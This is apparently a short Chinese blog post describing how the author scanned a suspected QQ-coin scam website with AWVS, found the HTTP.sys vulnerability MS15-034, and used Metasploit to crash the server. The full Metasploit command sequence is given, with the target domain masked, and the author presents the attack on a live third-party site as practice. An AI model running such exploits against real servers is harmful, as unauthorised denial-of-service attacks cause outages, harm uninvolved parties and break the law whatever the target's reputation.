最近在找一些盗号网站、诈骗网站练手，于是我发现了一个网站，所谓的刷QB
打开AWVS扫一扫
发现一个经常遇到的严重漏洞，这个比较常见，解决方法百度~，以下是攻击过程

HTTP.sys 中的漏洞可能允许远程执行代码
打开kali-msf
这个漏洞对应的编号是MS15-034
我们search一波

设置好参数后，run一波，提示成功，服务器down掉了


相关代码

search ms15-034
use 0
set rhost www.******.com
set threads 10
set targeturi /*****
run